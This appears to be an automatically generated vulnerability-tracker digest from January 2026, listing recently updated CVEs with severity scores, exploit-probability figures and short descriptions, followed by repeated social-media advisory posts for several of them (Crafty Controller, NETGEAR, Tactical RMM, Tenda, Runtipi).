##
Updated at UTC 2026-01-30T09:37:03.095811
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-0963 | 9.9 | 0.00% | 2 | 0 | 2026-01-30T07:16:15.173000 | An input neutralization vulnerability in the File Operations API Endpoint compon | |
| CVE-2026-0805 | 8.2 | 0.00% | 2 | 0 | 2026-01-30T07:16:14.917000 | An input neutralization vulnerability in the Backup Configuration component of C | |
| CVE-2026-24714 | 7.5 | 0.00% | 2 | 0 | 2026-01-30T05:16:33.093000 | Some end of service NETGEAR products provide "TelnetEnable" functionality, which | |
| CVE-2025-69517 | 9.8 | 0.05% | 2 | 0 | 2026-01-30T00:15:56.327000 | An HTML injection vulnerability in Amidaware Inc Tactical RMM v1.3.1 and earlier | |
| CVE-2026-1637 | 8.8 | 0.00% | 2 | 0 | 2026-01-29T23:16:11.473000 | A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element i | |
| CVE-2026-25116 | 7.6 | 0.00% | 2 | 0 | 2026-01-29T22:15:56.110000 | Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and pri | |
| CVE-2026-1340 | 9.8 | 0.00% | 5 | 0 | 2026-01-29T22:15:53.313000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2026-1281 | 9.8 | 0.00% | 6 | 0 | 2026-01-29T22:15:53.140000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2025-69516 | 8.8 | 0.00% | 2 | 0 | 2026-01-29T22:15:52.577000 | A Server-Side Template Injection (SSTI) vulnerability in the /reporting/template | |
| CVE-2025-56005 | 9.8 | 0.41% | 1 | 2 | 2026-01-29T21:30:26 | An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 all | |
| CVE-2025-71003 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T21:15:52.617000 | An input validation vulnerability in the flow.arange() component of OneFlow v0.9 | |
| CVE-2026-22260 | 7.5 | 0.01% | 1 | 0 | 2026-01-29T21:03:54.520000 | Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and pri | |
| CVE-2026-21962 | 10.0 | 0.04% | 3 | 4 | 2026-01-29T21:00:30.780000 | Vulnerability in the Oracle HTTP Server, Oracle Weblogic Server Proxy Plug-in pr | |
| CVE-2026-22806 | 9.1 | 0.00% | 2 | 0 | 2026-01-29T20:16:10.277000 | vCluster Platform provides a Kubernetes platform for managing virtual clusters, | |
| CVE-2025-69602 | 9.1 | 0.02% | 2 | 0 | 2026-01-29T20:16:09.663000 | A session fixation vulnerability exists in 66biolinks v62.0.0 by AltumCode, wher | |
| CVE-2026-24061 | 9.8 | 24.86% | 5 | 43 | template | 2026-01-29T19:16:19.890000 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2026-22795 | 5.5 | 0.03% | 1 | 0 | 2026-01-29T19:16:19.670000 | Issue summary: An invalid or NULL pointer dereference can happen in an applicati | |
| CVE-2026-1610 | 8.1 | 0.00% | 2 | 0 | 2026-01-29T19:16:19.483000 | A vulnerability was found in Tenda AX12 Pro V2 16.03.49.24_cn. Affected by this | |
| CVE-2026-1453 | 9.8 | 0.00% | 4 | 0 | 2026-01-29T19:16:18.987000 | A missing authentication for critical function vulnerability in KiloView Encoder | |
| CVE-2025-71007 | 7.5 | 0.02% | 6 | 0 | 2026-01-29T19:16:18.393000 | An input validation vulnerability in the oneflow.index_add component of OneFlow | |
| CVE-2025-61726 | 7.5 | 0.01% | 2 | 0 | 2026-01-29T19:16:16.243000 | The net/url package does not set a limit on the number of query parameters in a | |
| CVE-2025-14472 | 8.1 | 0.01% | 2 | 0 | 2026-01-29T19:16:10.993000 | Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia Content Hub all | |
| CVE-2025-13986 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T19:16:10.837000 | Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal | |
| CVE-2025-13982 | 8.1 | 0.01% | 2 | 0 | 2026-01-29T19:16:10.530000 | Cross-Site Request Forgery (CSRF) vulnerability in Drupal Login Time Restriction | |
| CVE-2026-24897 | 10.0 | 0.44% | 1 | 0 | 2026-01-29T17:16:25.253000 | Erugo is a self-hosted file-sharing platform. In versions up to and including 0. | |
| CVE-2025-71000 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T17:16:22.587000 | An issue in the flow.cuda.BoolTensor component of OneFlow v0.9.0 allows attacker | |
| CVE-2025-70999 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T17:16:22.420000 | A GPU device-ID validation flaw in the flow.cuda.get_device_capability() compone | |
| CVE-2025-65891 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T17:16:20.240000 | A GPU device-ID validation flaw in OneFlow v0.9.0 allows attackers to trigger a | |
| CVE-2025-65890 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T17:16:20.053000 | A device-ID validation flaw in OneFlow v0.9.0 allows attackers to cause a Denial | |
| CVE-2025-61731 | 7.8 | 0.01% | 2 | 0 | 2026-01-29T17:16:19.917000 | Building a malicious file with cmd/go can cause can cause a write to an attacker | |
| CVE-2025-14975 | 8.1 | 0.01% | 2 | 0 | 2026-01-29T17:16:15.460000 | The Custom Login Page Customizer WordPress plugin before 2.5.4 does not have a p | |
| CVE-2025-14840 | 7.5 | 0.02% | 2 | 0 | 2026-01-29T17:16:15.243000 | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal HTT | |
| CVE-2025-15467 | 9.8 | 0.12% | 13 | 2 | 2026-01-29T16:31:35.700000 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2025-40551 | 9.8 | 0.87% | 9 | 0 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri | |
| CVE-2025-40554 | 9.8 | 0.03% | 6 | 1 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass | |
| CVE-2025-40553 | 9.8 | 0.65% | 6 | 0 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri | |
| CVE-2025-40552 | 9.8 | 0.05% | 6 | 0 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to an authentication bypass | |
| CVE-2025-69420 | 7.5 | 0.07% | 2 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: A type confusion vulnerability exists in the TimeStamp Response v | |
| CVE-2026-24868 | 7.5 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | Mitigation bypass in the Privacy: Anti-Tracking component. This vulnerability af | |
| CVE-2025-69418 | 4.0 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: When using the low-level OCB API directly with AES-NI or<br>other | |
| CVE-2025-68160 | 4.7 | 0.03% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: Writing large, newline-free data into a BIO chain using the line- | |
| CVE-2025-15469 | 5.5 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: The 'openssl dgst' command-line tool silently truncates input dat | |
| CVE-2025-15468 | 5.9 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: If an application using the SSL_CIPHER_find() function in a QUIC | |
| CVE-2025-66199 | 5.9 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: A TLS 1.3 connection using certificate compression can be forced | |
| CVE-2025-11187 | 6.1 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: PBMAC1 parameters in PKCS#12 files are missing validation which c | |
| CVE-2026-22796 | 5.3 | 0.07% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: A type confusion vulnerability exists in the signature verificati | |
| CVE-2025-69419 | 7.4 | 0.03% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously craft | |
| CVE-2025-69421 | 0 | 0.03% | 1 | 0 | 2026-01-29T16:31:35.700000 | Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer de | |
| CVE-2025-14988 | 0 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | A security issue has been identified in ibaPDA that could allow unauthorized act | |
| CVE-2026-24842 | 8.2 | 0.03% | 1 | 0 | 2026-01-29T16:31:35.700000 | node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 | |
| CVE-2026-1280 | 7.5 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized fil | |
| CVE-2025-40536 | 8.1 | 0.24% | 1 | 0 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to a security control bypas | |
| CVE-2025-40537 | 7.5 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials | |
| CVE-2026-24840 | 8.0 | 0.02% | 1 | 0 | 2026-01-29T16:31:35.700000 | Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior | |
| CVE-2025-67645 | 8.8 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | OpenEMR is a free and open source electronic health records and medical practice | |
| CVE-2025-55292 | 8.2 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | Meshtastic is an open source mesh networking solution. In the current Meshtastic | |
| CVE-2026-24836 | 7.6 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-24833 | 7.6 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS | |
| CVE-2026-24770 | 9.8 | 0.42% | 1 | 0 | 2026-01-29T16:31:35.700000 | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versio | |
| CVE-2026-24783 | 7.5 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | soroban-fixed-point-math is a fixed-point math library for Soroban smart contact | |
| CVE-2026-24778 | 8.8 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | Ghost is an open source content management system. In Ghost versions 5.43.0 thro | |
| CVE-2026-24736 | 9.1 | 0.06% | 2 | 0 | 2026-01-29T16:31:35.700000 | Squidex is an open source headless content management system and content managem | |
| CVE-2026-24882 | 8.4 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon durin | |
| CVE-2026-23593 | 7.5 | 0.03% | 1 | 0 | 2026-01-29T16:31:35.700000 | A vulnerability in the web-based management interface of HPE Aruba Networking Fa | |
| CVE-2026-23881 | 7.7 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | Kyverno is a policy engine designed for cloud native platform engineering teams. | |
| CVE-2026-22258 | 7.5 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.1 | |
| CVE-2026-24831 | 7.5 | 0.04% | 2 | 0 | 2026-01-29T16:31:35.700000 | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-te | |
| CVE-2026-24874 | 9.1 | 0.03% | 2 | 0 | 2026-01-29T16:31:35.700000 | Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in t | |
| CVE-2026-0648 | 7.8 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | The vulnerability stems from an incorrect error-checking logic in the CreateCoun | |
| CVE-2026-24873 | 7.8 | 0.01% | 1 | 0 | 2026-01-29T16:31:35.700000 | Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects l | |
| CVE-2026-24872 | 9.8 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | improper pointer arithmetic vulnerability in ProjectSkyfire SkyFire_548.This i | |
| CVE-2026-24832 | 9.8 | 0.04% | 1 | 0 | 2026-01-29T16:31:35.700000 | Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affec | |
| CVE-2025-65889 | 7.5 | 0.02% | 4 | 0 | 2026-01-29T16:31:00.867000 | A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows a | |
| CVE-2025-65888 | 7.5 | 0.02% | 4 | 0 | 2026-01-29T16:31:00.867000 | A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allow | |
| CVE-2025-65886 | 7.5 | 0.02% | 4 | 0 | 2026-01-29T16:31:00.867000 | A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Den | |
| CVE-2026-1056 | 9.8 | 0.14% | 3 | 1 | 2026-01-29T16:31:00.867000 | The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file delet | |
| CVE-2025-57283 | 7.8 | 0.11% | 2 | 0 | 2026-01-29T16:31:00.867000 | The Node.js package browserstack-local 1.5.8 contains a command injection vulner | |
| CVE-2025-61140 | 9.8 | 0.02% | 2 | 0 | 2026-01-29T16:31:00.867000 | The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pol | |
| CVE-2025-62514 | 8.3 | 0.00% | 2 | 0 | 2026-01-29T16:31:00.867000 | Parsec is a cloud-based application for cryptographically secure file sharing. I | |
| CVE-2025-7714 | 7.5 | 0.00% | 2 | 0 | 2026-01-29T16:31:00.867000 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2025-7713 | 7.5 | 0.00% | 2 | 0 | 2026-01-29T16:31:00.867000 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site | |
| CVE-2026-1616 | 7.5 | 0.00% | 2 | 0 | 2026-01-29T16:31:00.867000 | The $uri$args concatenation in nginx configuration file present in Open Security | |
| CVE-2025-7016 | 8.0 | 0.05% | 2 | 0 | 2026-01-29T16:31:00.867000 | Improper Access Control vulnerability in Akın Software Computer Import Export In | |
| CVE-2026-24856 | 7.8 | 0.02% | 1 | 0 | 2026-01-29T16:31:00.867000 | iccDEV provides a set of libraries and tools that allow for the interaction, man | |
| CVE-2025-33217 | 7.8 | 0.01% | 2 | 0 | 2026-01-29T16:31:00.867000 | NVIDIA Display Driver for Windows contains a vulnerability where an attacker cou | |
| CVE-2025-33218 | 7.8 | 0.01% | 2 | 0 | 2026-01-29T16:31:00.867000 | NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mod | |
| CVE-2025-33219 | 7.8 | 0.01% | 2 | 0 | 2026-01-29T16:31:00.867000 | NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel mo | |
| CVE-2025-46691 | 7.8 | 0.01% | 1 | 0 | 2026-01-29T16:31:00.867000 | Dell PremierColor Panel Driver, versions prior to 1.0.0.1 A01, contains an Impro | |
| CVE-2025-68662 | 7.6 | 0.04% | 1 | 0 | 2026-01-29T16:31:00.867000 | Discourse is an open source discussion platform. In versions prior to 3.5.4, 202 | |
| CVE-2025-57795 | 9.9 | 0.23% | 2 | 0 | 2026-01-29T16:31:00.867000 | Explorance Blue versions prior to 8.14.13 contain an authenticated remote file d | |
| CVE-2025-57794 | 9.1 | 0.26% | 2 | 0 | 2026-01-29T16:31:00.867000 | Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted f | |
| CVE-2026-24772 | 8.9 | 0.02% | 1 | 0 | 2026-01-29T16:31:00.867000 | OpenProject is an open-source, web-based project management software. To enable | |
| CVE-2025-33220 | 7.8 | 0.01% | 1 | 0 | 2026-01-29T16:31:00.867000 | NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where | |
| CVE-2025-58150 | 8.8 | 0.01% | 1 | 0 | 2026-01-29T16:31:00.867000 | Shadow mode tracing code uses a set of per-CPU variables to avoid cumbersome par | |
| CVE-2026-24858 | 9.8 | 3.33% | 14 | 4 | 2026-01-29T13:16:51.047000 | An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-2 | |
| CVE-2026-24428 | 8.8 | 0.04% | 2 | 0 | 2026-01-29T13:02:04.990000 | Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) c | |
| CVE-2026-24429 | 9.8 | 0.06% | 2 | 0 | 2026-01-29T13:01:22.300000 | Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) s | |
| CVE-2026-23830 | 10.0 | 0.15% | 1 | 0 | 2026-01-29T03:43:44 | ### Summary A sandbox escape vulnerability due to `AsyncFunction` not being isol | |
| CVE-2026-24765 | 7.8 | 0.08% | 2 | 0 | 2026-01-29T03:43:28 | ### Overview A vulnerability has been discovered involving unsafe deserializati | |
| CVE-2026-24747 | 8.8 | 0.02% | 1 | 0 | 2026-01-29T03:42:53 | ### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an att | |
| CVE-2026-22039 | 10.0 | 0.04% | 1 | 0 | 2026-01-29T03:31:32 | ### Summary A critical authorization boundary bypass in namespaced Kyverno Poli | |
| CVE-2026-24838 | 9.1 | 0.04% | 2 | 0 | 2026-01-28T21:34:04 | Module title supports richtext which could include scripts that would execute in | |
| CVE-2025-57792 | 10.0 | 0.13% | 2 | 0 | 2026-01-28T21:31:21 | Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability c | |
| CVE-2025-57793 | 8.6 | 0.11% | 2 | 0 | 2026-01-28T21:31:21 | Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability c | |
| CVE-2026-24430 | 7.5 | 0.04% | 1 | 0 | 2026-01-28T20:16:51.880000 | Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) d | |
| CVE-2026-24436 | 9.8 | 0.03% | 1 | 0 | 2026-01-28T19:57:17.200000 | Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) d | |
| CVE-2026-24440 | 8.8 | 0.04% | 1 | 0 | 2026-01-28T19:20:05.660000 | Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) a | |
| CVE-2026-24837 | 7.7 | 0.04% | 1 | 0 | 2026-01-28T16:34:17 | A module friendly name could include scripts that will run during some module op | |
| CVE-2026-24477 | 7.5 | 0.02% | 1 | 0 | 2026-01-28T15:59:06.483000 | AnythingLLM is an application that turns pieces of content into context that any | |
| CVE-2026-21569 | 7.9 | 0.05% | 2 | 0 | 2026-01-28T15:31:30 | This High severity XXE (XML External Entity Injection) vulnerability was introdu | |
| CVE-2026-0844 | 8.8 | 0.03% | 1 | 0 | 2026-01-28T12:30:36 | The Simple User Registration plugin for WordPress is vulnerable to privilege esc | |
| CVE-2025-14386 | 8.8 | 0.11% | 1 | 0 | 2026-01-28T12:30:35 | The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrat | |
| CVE-2026-0702 | 7.5 | 0.03% | 1 | 0 | 2026-01-28T09:30:35 | The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerabl | |
| CVE-2025-59106 | 8.8 | 0.06% | 1 | 0 | 2026-01-27T21:32:51 | The binary serving the web server and executing basically all actions launched f | |
| CVE-2025-21589 | 9.8 | 0.03% | 2 | 0 | 2026-01-27T21:31:56 | An Authentication Bypass Using an Alternate Path or Channel vulnerability in Jun | |
| CVE-2026-24881 | 8.1 | 0.06% | 1 | 0 | 2026-01-27T21:31:49 | In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an | |
| CVE-2025-33234 | 7.8 | 0.01% | 2 | 0 | 2026-01-27T18:32:29 | NVIDIA runx contains a vulnerability where an attacker could cause a code inject | |
| CVE-2026-24875 | 7.8 | 0.01% | 1 | 0 | 2026-01-27T18:32:28 | Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affect | |
| CVE-2026-24869 | 8.1 | 0.03% | 1 | 0 | 2026-01-27T18:32:24 | Use-after-free in the Layout: Scrolling and Overflow component. This vulnerabili | |
| CVE-2026-21509 | 7.8 | 4.74% | 10 | 3 | 2026-01-27T16:19:42.330000 | Reliance on untrusted inputs in a security decision in Microsoft Office allows a | |
| CVE-2026-1470 | 9.9 | 0.31% | 5 | 1 | 2026-01-27T16:06:45.160000 | n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflo | |
| CVE-2025-52691 | 10.0 | 77.81% | 1 | 11 | template | 2026-01-27T15:28:07.247000 | Successful exploitation of the vulnerability could allow an unauthenticated atta |
| CVE-2026-21720 | 7.5 | 0.04% | 1 | 0 | 2026-01-27T15:15:57.583000 | Every uncached /avatar/:hash request spawns a goroutine that refreshes the Grava | |
| CVE-2026-23864 | 7.5 | 0.60% | 2 | 0 | 2026-01-27T14:59:34.073000 | Multiple denial of service vulnerabilities exist in React Server Components, aff | |
| CVE-2026-22709 | 9.8 | 0.06% | 2 | 0 | 2026-01-27T14:59:34.073000 | vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `P | |
| CVE-2025-41727 | 7.8 | 0.02% | 1 | 0 | 2026-01-27T14:59:34.073000 | A local low privileged attacker can bypass the authentication of the Device Mana | |
| CVE-2025-41726 | 8.8 | 0.18% | 1 | 0 | 2026-01-27T14:59:34.073000 | A low privileged remote attacker can execute arbitrary code by sending specially | |
| CVE-2026-24828 | 7.5 | 0.04% | 1 | 0 | 2026-01-27T14:59:34.073000 | Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is | |
| CVE-2026-24827 | 7.5 | 0.04% | 1 | 0 | 2026-01-27T12:31:24 | Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affec | |
| CVE-2026-24830 | 9.8 | 0.04% | 1 | 0 | 2026-01-27T12:31:24 | Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects | |
| CVE-2026-21721 | 8.1 | 0.03% | 1 | 0 | 2026-01-27T09:30:36 | The dashboard permissions API does not verify the target dashboard scope and onl | |
| CVE-2026-24536 | 7.5 | 0.04% | 1 | 0 | 2026-01-26T23:16:10.593000 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne | |
| CVE-2026-24524 | 8.1 | 0.03% | 1 | 0 | 2026-01-26T23:16:09.643000 | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploi | |
| CVE-2026-24523 | 7.5 | 0.04% | 1 | 0 | 2026-01-26T23:16:09.460000 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulne | |
| CVE-2026-24538 | 7.6 | 0.12% | 1 | 0 | 2026-01-26T21:30:35 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP | |
| CVE-2026-0863 | 8.5 | 0.06% | 4 | 0 | 2026-01-26T15:05:39.840000 | Using string formatting and exception handling, an attacker may bypass n8n's pyt | |
| CVE-2026-0920 | 9.8 | 0.03% | 2 | 3 | 2026-01-26T15:04:59.737000 | The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Ad | |
| CVE-2026-24002 | 9.0 | 0.06% | 1 | 0 | 2026-01-26T15:04:59.737000 | Grist is spreadsheet software using Python as its formula language. Grist offers | |
| CVE-2025-15059 | 7.8 | 0.06% | 1 | 0 | 2026-01-26T15:04:14.850000 | GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi | |
| CVE-2024-37079 | 9.8 | 79.02% | 1 | 0 | 2026-01-26T14:52:05.833000 | vCenter Server contains a heap-overflow vulnerability in the implementation of t | |
| CVE-2026-24423 | None | 0.12% | 2 | 1 | 2026-01-23T18:31:37 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2024-9932 | 9.8 | 81.47% | 1 | 3 | 2026-01-23T16:15:51.050000 | The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads | |
| CVE-2026-22794 | 9.6 | 0.03% | 1 | 2 | 2026-01-21T19:14:17.880000 | Appsmith is a platform to build admin panels, internal tools, and dashboards. Pr | |
| CVE-2025-64328 | 0 | 0.46% | 2 | 1 | 2025-11-12T16:20:22.257000 | FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX | |
| CVE-2025-12556 | 8.8 | 0.11% | 2 | 0 | 2025-11-06T19:45:09.883000 | An argument injection vulnerability exists in the affected product that could al | |
| CVE-2025-34164 | 0 | 0.30% | 1 | 0 | 2025-11-03T16:15:34.277000 | A heap-based buffer overflow vulnerability in NetSupport Manager 14.x versions p | |
| CVE-2025-8088 | 8.8 | 2.98% | 7 | 27 | 2025-10-30T15:50:59.680000 | A path traversal vulnerability affecting the Windows version of WinRAR allows th | |
| CVE-2025-0282 | 9.0 | 94.11% | 2 | 10 | template | 2025-10-24T13:54:58.783000 | A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, |
| CVE-2025-34165 | 0 | 0.25% | 1 | 0 | 2025-09-02T15:55:35.520000 | A stack-based buffer overflow vulnerability in NetSupport Manager 14.x versions | |
| CVE-2025-2294 | 9.8 | 54.35% | 1 | 9 | template | 2025-03-28T18:11:40.180000 | The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclu |
| CVE-2022-48986 | 5.5 | 0.11% | 1 | 0 | 2024-11-01T15:30:13.770000 | In the Linux kernel, the following vulnerability has been resolved: mm/gup: fix | |
| CVE-2026-2150 | 0 | 0.00% | 1 | 3 | N/A | ||
| CVE-2025-26385 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-24841 | 0 | 0.25% | 1 | 0 | N/A | ||
| CVE-2026-24741 | 0 | 0.07% | 1 | 0 | N/A | ||
| CVE-2026-22259 | 0 | 0.05% | 1 | 0 | N/A | ||
| CVE-2025-68670 | 0 | 0.17% | 1 | 0 | N/A |
updated 2026-01-30T07:16:15.173000
2 posts
🔴 CVE-2026-0963 - Critical (9.9)
An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0963/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0963 - Critical (9.9)
An input neutralization vulnerability in the File Operations API Endpoint component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0963/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-30T07:16:14.917000
2 posts
🟠 CVE-2026-0805 - High (8.2)
An input neutralization vulnerability in the Backup Configuration component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0805/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0805 - High (8.2)
An input neutralization vulnerability in the Backup Configuration component of Crafty Controller allows a remote, authenticated attacker to perform file tampering and remote code execution via path traversal.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0805/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-30T05:16:33.093000
2 posts
🟠 CVE-2026-24714 - High (7.5)
Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24714 - High (7.5)
Some end of service NETGEAR products provide "TelnetEnable" functionality, which allows a magic packet to activate telnet service on the box.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-30T00:15:56.327000
2 posts
🔴 CVE-2025-69517 - Critical (9.8)
An issue in Amidaware Inc Tactical RMM v1.3.1 and before allows a remote attacker to execute arbitrary code via the /api/tacticalrmm/apiv3/views.py component
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69517/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-69517 - Critical (9.8)
An issue in Amidaware Inc Tactical RMM v1.3.1 and before allows a remote attacker to execute arbitrary code via the /api/tacticalrmm/apiv3/views.py component
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69517/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T23:16:11.473000
2 posts
🟠 CVE-2026-1637 - High (8.8)
A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is pos...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1637/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1637 - High (8.8)
A vulnerability was identified in Tenda AC21 16.03.08.16. The affected element is the function fromAdvSetMacMtuWan of the file /goform/AdvSetMacMtuWan. The manipulation leads to stack-based buffer overflow. Remote exploitation of the attack is pos...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1637/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T22:15:56.110000
2 posts
🟠 CVE-2026-25116 - High (7.6)
Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and prior to version 4.7.2, an unauthenticated Path Traversal vulnerability in the `UserConfigController` allows any remote user to overwrite the system's `docker-compose.yml...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25116/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25116 - High (7.6)
Runtipi is a personal homeserver orchestrator. Starting in version 4.5.0 and prior to version 4.7.2, an unauthenticated Path Traversal vulnerability in the `UserConfigController` allows any remote user to overwrite the system's `docker-compose.yml...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25116/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
